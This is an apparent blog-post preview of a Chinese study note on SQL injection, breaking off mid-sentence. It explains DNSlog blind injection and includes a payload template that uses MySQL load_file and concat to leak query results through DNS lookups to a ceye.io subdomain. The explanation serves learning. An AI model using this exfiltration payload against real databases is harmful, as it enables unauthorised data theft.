20206月份sql注入学习总结
Dnslog盲注:
攻击者首先提交注入语句select load_file(concat(’\\’,‘攻击语句’,.XXX.ceye.io\abc)),concat()把执行结果语句和XXX.ceye.io\abc进行拼接,构成一个新的域名,而mysql中的select load_file()可以发起请求,那么这一条带有数据库查询结果的域名就被提交到DNS服务器进行解析,DNS服务器上的Dnslog就可以得到SQL注入结果,注入语句中的ceye.io,是一个开放的Dnslog平台,我们可以从平台获取到有关c
原创
2020-07-02 10:56:16 ·
597 阅读 ·
0 评论